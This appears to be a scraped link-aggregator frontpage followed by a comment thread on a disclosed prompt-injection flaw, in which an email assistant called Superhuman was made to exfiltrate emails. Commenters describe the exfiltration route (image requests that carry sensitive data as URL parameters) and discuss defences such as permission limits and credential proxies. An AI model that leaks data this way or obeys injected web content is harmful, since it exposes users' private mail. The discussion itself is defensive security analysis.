frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

fp.

Start all of your commands with a comma (2009)

https://rhodesmill.org/brandon/2009/commands-with-comma/
258•theblazehen•2d ago•86 comments

Hoot: Scheme on WebAssembly

https://www.spritely.institute/hoot/
27•AlexeyBrin•1h ago•3 comments

OpenCiv3: Open-source, cross-platform reimagining of Civilization III

https://openciv3.org/
707•klaussilveira•15h ago•206 comments

The Waymo World Model

https://waymo.com/blog/2026/02/the-waymo-world-model-a-new-frontier-for-autonomous-driving-simula...
969•xnx•21h ago•558 comments

Vocal Guide – belt sing without killing yourself

https://jesperordrup.github.io/vocal-guide/
70•jesperordrup•6h ago•31 comments

Reinforcement Learning from Human Feedback

https://arxiv.org/abs/2504.12501
7•onurkanbkrc•49m ago•0 comments

Making geo joins faster with H3 indexes

https://floedb.ai/blog/how-we-made-geo-joins-400-faster-with-h3-indexes
135•matheusalmeida•2d ago•35 comments

Where did all the starships go?

https://www.datawrapper.de/blog/science-fiction-decline
45•speckx•4d ago•36 comments

Unseen Footage of Atari Battlezone Arcade Cabinet Production

https://arcadeblogger.com/2026/02/02/unseen-footage-of-atari-battlezone-cabinet-production/
68•videotopia•4d ago•7 comments

Welcome to the Room – A lesson in leadership by Satya Nadella

https://www.jsnover.com/blog/2026/02/01/welcome-to-the-room/
39•kaonwarb•3d ago•30 comments

Ga68, a GNU Algol 68 Compiler

https://fosdem.org/2026/schedule/event/PEXRTN-ga68-intro/
13•matt_d•3d ago•2 comments

What Is Ruliology?

https://writings.stephenwolfram.com/2026/01/what-is-ruliology/
45•helloplanets•4d ago•46 comments

Show HN: Look Ma, No Linux: Shell, App Installer, Vi, Cc on ESP32-S3 / BreezyBox

https://github.com/valdanylchuk/breezydemo
240•isitcontent•16h ago•26 comments

Monty: A minimal, secure Python interpreter written in Rust for use by AI

https://github.com/pydantic/monty
238•dmpetrov•16h ago•127 comments

Show HN: I spent 4 years building a UI design tool with only the features I use

https://vecti.com
340•vecti•18h ago•150 comments

Hackers (1995) Animated Experience

https://hackers-1995.vercel.app/
506•todsacerdoti•23h ago•248 comments

Sheldon Brown's Bicycle Technical Info

https://www.sheldonbrown.com/
390•ostacke•22h ago•98 comments

Show HN: If you lose your memory, how to regain access to your computer?

https://eljojo.github.io/rememory/
304•eljojo•18h ago•188 comments

Microsoft open-sources LiteBox, a security-focused library OS

https://github.com/microsoft/litebox
361•aktau•22h ago•186 comments

An Update on Heroku

https://www.heroku.com/blog/an-update-on-heroku/
428•lstoll•22h ago•284 comments

Cross-Region MSK Replication: K2K vs. MirrorMaker2

https://medium.com/lensesio/cross-region-msk-replication-a-comprehensive-performance-comparison-o...
3•andmarios•4d ago•1 comments

PC Floppy Copy Protection: Vault Prolok

https://martypc.blogspot.com/2024/09/pc-floppy-copy-protection-vault-prolok.html
71•kmm•5d ago•10 comments

Was Benoit Mandelbrot a hedgehog or a fox?

https://arxiv.org/abs/2602.01122
24•bikenaga•3d ago•11 comments

Dark Alley Mathematics

https://blog.szczepan.org/blog/three-points/
96•quibono•4d ago•22 comments

The AI boom is causing shortages everywhere else

https://www.washingtonpost.com/technology/2026/02/07/ai-spending-economy-shortages/
26•1vuio0pswjnm7•2h ago•16 comments

How to effectively write quality code with AI

https://heidenstedt.org/posts/2026/how-to-effectively-write-quality-code-with-ai/
271•i5heu•18h ago•219 comments

Delimited Continuations vs. Lwt for Threads

https://mirageos.org/blog/delimcc-vs-lwt
34•romes•4d ago•3 comments

I now assume that all ads on Apple news are scams

https://kirkville.com/i-now-assume-that-all-ads-on-apple-news-are-scams/
1079•cdrnsf•1d ago•462 comments

Introducing the Developer Knowledge API and MCP Server

https://developers.googleblog.com/introducing-the-developer-knowledge-api-and-mcp-server/
64•gfortaine•13h ago•30 comments

Understanding Neural Network, Visually

https://visualrambling.space/neural-network/
306•surprisetalk•3d ago•44 comments
Open in hackernews

Superhuman AI Exfiltrates Emails

https://www.promptarmor.com/resources/superhuman-ai-exfiltrates-emails
114•takira•3w ago
A bit more at https://simonwillison.net/2026/Jan/12/superhuman-ai-exfiltra...

Comments

sarelta•3w ago
I'm impressed Superhuman seems to have handled this so well - lots of big names are fumbling with AI vuln disclosures. Grammarly is not necessarily who I would have bet on to get it right
empiko•3w ago
I wonder how they handled it. Everybody's connecfing their AI to the Web, but it automatically means that any data AI has access to can be extracted by the attacker. The only safe way forward is to 1. disconnect the Web or 2. perhaps to filter the generated URLs aggressively.
ttoinou•3w ago
We should have a clearer view of permissions of the AI, operations it does, and have one button per day to accept/deny operations from given data. Instead of auto approval.
wat10000•3w ago
Private data, untrusted data, communication: an LLM can safely have two of these, but never all three.

Browsing the web is both communication and untrusted data, so it must never have access to any trusted data if it has the ability to browse the web.

The problem is, so much of what people want from these things involves having all three.

TeMPOraL•3w ago
> The problem is, so much of what people want from these things involves having all three.

Pretty much. Also there's no way of "securing" LLMs without destroying the quality that makes them interesting and useful in the first place.

I'm putting "securing" in scare quotes because IMO it's fool's errand to even try - LLMs are fundamentally not securable like regular, narrow-purpose software, and should not be treated as such.

bossyTeacher•3w ago
> I'm putting "securing" in scare quotes because IMO it's fool's errand to even try - LLMs are fundamentally not securable like regular, narrow-purpose software, and should not be treated as such.

Indeed. Between this fundamental unsecurability and alignment, I struggle to see how OpenAI/Anthropic/etc will manage to give their investors enough RoI to justify the investment

djaouen•3w ago
Are you f*cking kidding me? Grammarly is like the best one!
0xferruccio•3w ago
The primary exfiltration vector for LLMs is making network requests via images with sensitive data as parameters.

As Claude Code increasingly uses browser tools, we may need to move away from .env files to something encrypted, kind of like rails credentials, but without the secret key in the .env

SahAssar•3w ago
So you are going to take the untrusted tool that kept leaking your secrets, keep the secrets away from it but still use it to code the thing that uses the secrets? Are you actually reviewing the code it produces? In 99% of cases that's a "no" or a soft "sometimes".
TeMPOraL•3w ago
That's exactly what one does with their employees when one deploys "credential vaults", so?
SahAssar•3w ago
Employees are under contract and are screened for basic competence. LLMs aren't and can't be.
TeMPOraL•3w ago
> Employees are under contract and are screened for basic competence. LLMs aren't

So perhaps they should be.

> and can't be.

Ah but they must, because there's not much else you can do.

You can't secure LLMs like they were just regular, narrow-purpose software, because they aren't. They're by nature more like little people on a chip (this is an explicit design goal) - and need to be treated accordingly.

SahAssar•3w ago
> So perhaps they should be.

Unless both the legalities and technology radically change they will not be. And the companies building them will not take on the burden since the technology has proved to be so unpredictable (partially by design) and unsafe.

> designed to be more like little people on a chip - and need to be treated accordingly

Deeply unpredictable and unsafe people on a chip, so not the sort that I generally want to trust secrets with.

I don't think it's that complex, you can have secure systems or you can have current gen LLMs. You can't have both in the same place.

TeMPOraL•3w ago
> Deeply unpredictable and unsafe people on a chip, so not the sort that I generally want to trust secrets with.

Very true when comparing to acquaintances, but at a scale of any company or system except the tiniest ones, you can't blindly trust people in general either. Building systems involving people and LLMs is pretty similar.

> I don't think it's that complex, you can have secure systems or you can have current gen LLMs. You can't have both in the same place.

That is, indeed, the key. My point is that, unlike the popular opinion in threads like this, it does not follow that we need to give up on LLMs, or that we need to fix the security issues. The former is undesirable, the latter is fundamentally impossible.

What we need is what we've been doing ever since civilization took shape, ever since we've started building machines: recognize that automatons and people are different kinds of components, with different reliability and security characteristics. You can't blindly substitute one for the other, but there are ways to make them work together. Most systems we've created are of that nature.

What people still get wrong is treating LLMs as "automatons" components. They're not, they're "people" components.

SahAssar•3w ago
I think I generally agree, but I also think that treating them like people means that you expect reason, intelligence and a way to interrogate their way of "thinking" (very broad quotes here).

I think LLMs are to be treated as something completely separate from both predictable machines ("automatons") and people. They have separate concerns and fitness for a use-case than both existing categories.

majormajor•3w ago
Sooo the primary way we enforce contracts and laws against people are things like fines and jail time.

How would you apply the threat of those to "little people on a chip", exactly?

Imagine if any time you hired someone there was a risk that they'd try to steal everything they could from your company and then disappear forever with you having no way to hold them to account? You'd probably stop hiring people you didn't already deeply trust!

Strict liability for LLM service providers? Well, that's gonna be a non-starter unless there's a lot of MAJOR issues caused by LLMs (look at how little we care about identity theft and financial fraud currently).

xyzzy123•3w ago
One tactic I've seen used in various situations is proxies outside the sandbox that augment requests with credentials / secrets etc.

Doesn't help in the case where the LLM is processing actually sensitive data, ofc.

touristtam•3w ago
Can't use a tool like dotenvx?
djaouen•3w ago
Programming used to prevent this by separating code from data. AI (currently) has no such safeguards.
TeMPOraL•3w ago
Reality doesn't have a distinction between "code" and "data"; those are categories of convenience, and don't even have a proper definition (what is code and what is data depends on who's asking and why). Any such distinction requires mechanically enforcing it; AI won't have it, because it's not natural, and adding it destroys generality of the model.
djaouen•3w ago
OK, then sequence your DNA and send it to me. I will make sure to use it as code!
TeMPOraL•3w ago
Haha. But DNA is a very good example of what I'm talking about. It's both "code" and "data" at the same time - or rather, a perfect demonstration that these concepts don't exist in nature.
djaouen•3w ago
Yes, but for me to use your DNA as code would be a major malfunction!
TeMPOraL•3w ago
I get the joke, but it's also an incredibly interesting topic to ponder. Remember "Reflections on Trusting Trust"? Now consider that DNA itself needs a complex biomolecular machine to "compile" it into cells and organisms, and that this also embeds in them copies of the "compiler" itself. This raises the question of whether, and how much, information needed to build the organism is not explicitly encoded anywhere in the DNA itself, and instead accumulates in the replication mechanism and gets carried over implicitly.

So for you to successfully use my DNA as code, without also borrowing the compiler from my body, would be a major scientific result, shining light on the questions outlined above.

So in short: I'm happy to contribute my DNA if you cite me as co-author on the resulting paper :P.

observationist•3w ago
As limited as they are, LLMs are demonstrably smarter than a whole lot of people, and the number of people more clever than the best AI is going to dwindle, rapidly, especially in the domain of doing sneaky shit really fast on a computer.

There are countless examples of schemes in stories where codes and cryptography are used to exfiltrate information and evade detection, and these models are trained on every last piece of technical, practical text humanity has produced on the subject. All they have to do is contextualize what's likely being done to check and mash together two or three systems it thinks is likely to go under the radar.

sph•3w ago
“This is good for AI.”
ineedasername•3w ago
Why does an agent tasked with email summarizing have access to anything else? There’s plenty of difference between an agent and a background service or daemon but it’s at minimum got to be given the same restrictions in scope they would be, or an intern using your system for the same purpose. Developers need to bring the same ZTA mindset to agent permissions they would to building the other services and infrastructure they rely on.
rapind•3w ago
“Move fast and break things.” It’s funny you even need to ask on hacker news of all places. ;)
stubish•3w ago
This demonstrates how adding AI features to software such as web browsers dramatically increases the attack surface. It has to be considered potentially malicious and jailed, and hopefully everyone remembers to respect that jail and put up guardrails. Given our history of chroots and jails and containers and virtualization, we know escapes are going to happen. Reminds me of Word and Excel viruses, when scripting was added to documents and left on by default.
moritzwarhier•3w ago
Personally, I'd expect a product called SuperHuman to scam me in every way possible, although I know it's just a fancy name for a B2B automation company/ mass mail service